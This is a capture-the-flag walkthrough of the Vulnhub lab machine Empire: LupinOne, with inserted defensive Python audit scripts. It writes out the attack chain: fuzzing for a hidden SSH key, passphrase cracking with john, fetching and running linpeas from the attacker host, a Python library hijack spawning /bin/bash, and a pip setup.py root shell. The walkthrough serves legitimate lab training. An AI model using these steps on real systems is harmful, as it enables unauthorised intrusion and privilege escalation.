Empire: LupinOne Vulnhub WriteUp

Walkthrough for Empire LupinOne in VulnHub


Last updated 2 years ago

Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put their skills to the test.

Download

  • 01-Empire-Lupin-One.zip (Size: 922 MB)

Pentesting Methodology

Network Scanning

  • netdiscover

  • nmap

Enumeration

  • abusing HTTP

  • fuzzing

Exploitation

  • john

  • ssh

Privilege Escalation

  • linpeas

  • python library hijacking

  • pip

  • root flag

Level: Easy-Medium

Network Scanning

To begin, we use the netdiscover command to scan the local network for the IP address of the victim machine.

With the target located (192.168.1.2), we run Nmap with default scripts and version detection:

nmap -sC -sV 192.168.1.2

According to the nmap output:

  • port 22 runs an SSH server.

  • port 80 runs an HTTP service (Apache), and the script output reveals a /~myfiles path.

Enumeration

We began enumeration by requesting the /~myfiles page over HTTP. It returned a 404 error, which seemed suspicious.

http://192.168.1.2/~myfiles/

Viewing the page source, we found the comment “you can do it, keep trying”.

Taking the hint, we fuzzed for other user-style directories under /~ with ffuf and found a directory named secret.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.2/~FUZZ'

Looking at the secret directory, the author's note says that an SSH private key file for the user “icex64” is stored there, and that its name has to be fuzzed.

To find the key file, we fuzzed again with ffuf, this time for hidden (dot-prefixed) files under /~secret/, and found the text file .mysecret.txt.

ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.1.2/~secret/.FUZZ' -fc 403 -e .txt,.html

Opening .mysecret.txt in a browser, we found what appeared to be an SSH private key, but in encoded form. On closer inspection, the encoding was Base58.

http://192.168.1.2/~secret/.mysecret.txt

We pasted the encoded text into an online Base58 decoder, clicked the Base-58 Decode button, and received the decoded SSH private key, which we saved to a file named sshkey.
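As an added example that is not part of the original writeup: a small Base58 codec in Python, for anyone who would rather not paste a private key into a third-party website. It tolerates the line breaks a browser or cat inserts, and the key-shaped check is an assumption about what a correctly decoded file should look like; the sample key text is constructed.

```python
# Base58 (Bitcoin alphabet: no 0, O, I or l) decoder and encoder, plus a check
# that the decoded bytes look like a PEM/OpenSSH private key.

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def is_base58_text(text: str) -> bool:
    """True when every non-whitespace character belongs to the Base58 alphabet."""
    cleaned = "".join(text.split())
    return bool(cleaned) and all(ch in _INDEX for ch in cleaned)


def base58_decode(text: str) -> bytes:
    """Decode Base58. Each leading '1' stands for one leading zero byte."""
    cleaned = "".join(text.split())  # drop newlines/spaces from copy-paste
    value = 0
    for ch in cleaned:
        if ch not in _INDEX:
            raise ValueError(f"not a Base58 character: {ch!r}")
        value = value * 58 + _INDEX[ch]
    leading_zeros = len(cleaned) - len(cleaned.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading_zeros + body


def base58_encode(data: bytes) -> str:
    """Inverse of base58_decode; used here to build test input."""
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 58)
        digits.append(ALPHABET[rem])
    return "1" * leading_zeros + "".join(reversed(digits))


def looks_like_private_key(data: bytes) -> bool:
    """Assumption: a decoded key file starts with a PEM-style BEGIN ... PRIVATE KEY header."""
    return data.startswith(b"-----BEGIN") and b"PRIVATE KEY-----" in data


# Constructed stand-in for the file found on the box (NOT the real key).
SAMPLE_KEY = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
    b"b3BlbnNzaC1rZXktdjEAAAAA\n"
    b"-----END OPENSSH PRIVATE KEY-----\n"
)
SAMPLE_ENCODED = base58_encode(SAMPLE_KEY)


if __name__ == "__main__":
    decoded = base58_decode(SAMPLE_ENCODED)
    print("valid Base58:", is_base58_text(SAMPLE_ENCODED))
    print("looks like a private key:", looks_like_private_key(decoded))
    print(decoded.decode())
```

Run it against the contents of a suspicious file to confirm both that the text is Base58 and that what comes out is a key; an exposed, merely encoded private key in a web root is a finding regardless of whether it is passphrase-protected.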

Exploitation

Because the author's note hinted that the key is protected by a passphrase, we used ssh2john to convert the key into a hash that john can crack.

locate ssh2john
/usr/share/john/ssh2john.py sshkey > hash

Now, use john to crack the hash value.

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

Within a few seconds: Bingo!! john recovered the key's passphrase (P@55w0rd!).

We now have everything needed for an SSH login: the username icex64, the private key, and the cracked passphrase (P@55w0rd!).

ssh -i sshkey icex64@192.168.1.2

Bang!! We were in as icex64. Checking this user's sudo permissions showed that icex64 may run a Python script, /home/arsene/heist.py, as the user arsene. Reading the script, we saw that it imports the webbrowser module, which makes it a candidate for Python library hijacking.

sudo -l
cat /home/arsene/heist.py

Privilege Escalation

Now for privilege escalation. To use the Python library hijacking technique, we first need to find where webbrowser.py lives on the target, so we turned to the linpeas script. On the Kali machine (192.168.1.3), we served linpeas.sh with Python's built-in HTTP server:

python -m SimpleHTTPServer 80

Back in the icex64 SSH session, we changed to /tmp and downloaded linpeas.sh from the Kali machine with wget.

cd /tmp
wget 192.168.1.3/linpeas.sh

We gave the script full permissions (chmod 777) and ran it straight away.

chmod 777 linpeas.sh
./linpeas.sh

Within seconds, linpeas reported the location of webbrowser.py.

We opened webbrowser.py with nano and added a line that spawns /bin/bash, so that a shell is launched as soon as heist.py imports the module:

os.system("/bin/bash")

With that in place, we ran heist.py through sudo exactly as the rule from sudo -l on icex64 permits, which executes our modified module and switches us from icex64 to arsene.

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
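The hijack above works only because a module on the script's import path was writable by a lower-privileged user. As an added example (not from the original writeup), here is a Python audit that resolves a module the way import does, walking the search path in order, and reports every directory searched before the real module and every module file that is group- or world-writable. The sandbox built by demo() is constructed; the directory and file names are assumptions.

```python
import os
import stat
import sys
import tempfile
from typing import List, Optional, Tuple

Finding = Tuple[str, str]  # (kind, path)


def _writable_by_others(path: str) -> bool:
    """True if the group or world write bit is set (owner write is expected)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_module(module_name: str, search_path: List[str]) -> Tuple[Optional[str], List[Finding]]:
    """Resolve module_name like `import` would and collect hijack risks.

    Python walks the search path in order (sys.path[0] is the script's own
    directory when a script is run). Within one directory a package
    (module_name/__init__.py) takes precedence over module_name.py.
      - writable-dir: a directory searched BEFORE the real module is found;
        anyone who can write there can drop a same-named file that shadows it.
      - writable-module: the resolved file itself can be edited in place.
    Non-directory entries ('' and zip archives) are skipped.
    """
    findings: List[Finding] = []
    for directory in search_path:
        if not os.path.isdir(directory):
            continue
        if _writable_by_others(directory):
            findings.append(("writable-dir", directory))
        candidates = (
            os.path.join(directory, module_name, "__init__.py"),
            os.path.join(directory, module_name + ".py"),
        )
        for candidate in candidates:
            if os.path.isfile(candidate):
                if _writable_by_others(candidate):
                    findings.append(("writable-module", candidate))
                return candidate, findings
    return None, findings


def demo() -> Tuple[Optional[str], List[Finding]]:
    """Constructed sandbox mirroring the risky layout: a world-writable script
    directory first on the path, then a library directory whose webbrowser.py
    is group-writable. None of this touches the real interpreter."""
    root = tempfile.mkdtemp(prefix="hijack-audit-")
    script_dir = os.path.join(root, "script_dir")
    lib_dir = os.path.join(root, "lib")
    os.mkdir(script_dir)
    os.mkdir(lib_dir)
    os.chmod(script_dir, 0o777)  # anyone may drop webbrowser.py here
    os.chmod(lib_dir, 0o755)
    module = os.path.join(lib_dir, "webbrowser.py")
    with open(module, "w") as fh:
        fh.write("# stand-in for the real stdlib module\n")
    os.chmod(module, 0o664)  # group-writable: editable in place
    return audit_module("webbrowser", [script_dir, lib_dir])


if __name__ == "__main__":
    # Audit the running interpreter's real search path for the module heist.py imports.
    resolved, findings = audit_module("webbrowser", sys.path)
    print("webbrowser resolves to:", resolved)
    for kind, path in findings:
        print(f"  [{kind}] {path}")
```

Run it with the same interpreter and from the same directory that the sudo rule uses (here /usr/bin/python3.9 with the script in /home/arsene), because the resolved path and the directory order depend on both; a clean result means no directory before the real module, and not the module itself, is writable by the user who is allowed to invoke the script.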

As arsene, we checked this user's sudo permissions again and found that arsene can run the pip binary as root without a password. After a moment's thought, that pointed us to pip privilege escalation.

sudo -l

Following the GTFOBins entry for pip, the escalation takes only three commands:

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
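Both sudo rules on this box (python3.9 with a fixed script as arsene, pip as root with NOPASSWD) are the kind of entry an administrator should catch when reviewing sudo -l output. As an added example that is not part of the original writeup, here is a small parser for the rule lines that sudo -l prints, with an audit that flags interpreters and package installers; the two sample outputs are constructed to match what the writeup describes, and the hostname LupinOne in them is a placeholder.

```python
import os
import re
from typing import List, NamedTuple


class SudoRule(NamedTuple):
    runas: str      # user(s) the command may run as, e.g. "root"
    nopasswd: bool  # True when the NOPASSWD tag is present
    command: str    # the binary path
    args: str       # fixed arguments, or "" when none are listed


# One rule line of `sudo -l` output, e.g. "    (root) NOPASSWD: /usr/bin/pip".
# Tags such as NOPASSWD: or SETENV: sit between the runas list and the command.
_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S+)(?:\s+(?P<args>.*))?\s*$"
)


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Extract the rule lines from `sudo -l` output; header lines are ignored."""
    rules = []
    for line in output.splitlines():
        m = _RULE_RE.match(line)
        if not m:
            continue
        rules.append(SudoRule(
            runas=m.group("runas").strip(),
            nopasswd="NOPASSWD" in m.group("tags"),
            command=m.group("cmd"),
            args=(m.group("args") or "").strip(),
        ))
    return rules


def audit_sudo_l(output: str) -> List[str]:
    """Return one warning per rule that hands out arbitrary code execution."""
    findings = []
    for rule in parse_sudo_l(output):
        base = os.path.basename(rule.command)
        auth = "without a password" if rule.nopasswd else "with the caller's password"
        if base.startswith("pip"):
            findings.append(
                f"({rule.runas}) {rule.command}: pip install executes the package's "
                f"setup.py as {rule.runas} {auth}"
            )
        elif base.startswith("python"):
            if rule.args:
                findings.append(
                    f"({rule.runas}) {rule.command} {rule.args}: the script and every "
                    f"module it imports must not be writable by the invoking user "
                    f"(Python library hijacking)"
                )
            else:
                findings.append(
                    f"({rule.runas}) {rule.command}: unrestricted interpreter, "
                    f"arbitrary code as {rule.runas} {auth}"
                )
    return findings


# Constructed samples (hostname is a placeholder) matching the writeup's two users.
SAMPLE_ICEX64 = """\
Matching Defaults entries for icex64 on LupinOne:
    env_reset, mail_badpass

User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
"""

SAMPLE_ARSENE = """\
User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
"""


if __name__ == "__main__":
    for sample in (SAMPLE_ICEX64, SAMPLE_ARSENE):
        for warning in audit_sudo_l(sample):
            print(warning)
```

The fix on the defender's side is the mirror image of the writeup: do not grant pip (or any interpreter) through sudo at all, and when a specific script must run as another user, make sure that user, not the caller, owns the script and every directory on its import path.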

Yippee!! We finally have root. The id command confirms it, and changing into /root gives us the root flag. Congo!!

That is how we got a root shell on this machine. It was a terrific exercise and a lot of fun. To understand the different scenarios, it is worth trying it yourself at least once.

Download (Mirror): https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip

We looked up a Base58 decoder online and found browserling. It is the most basic online Base58 decoder for web developers and programmers.

We had previously downloaded the linpeas script from its git page. We then navigated to that directory and launched a basic Python HTTP server.

We can now begin the Python library hijacking procedure, which applies when an attacker can write to a module imported by a Python program running in a more privileged context; you can learn more about this technique here.

We used the GTFOBins instructions provided here to conduct the pip privilege escalation. If the programme is allowed to run as superuser by sudo, it retains its elevated rights and can be used to access the file system, escalate, or keep privileged access.

Author: Eopi Noriko is a passionate Cybersecurity Researcher; contact: Facebook.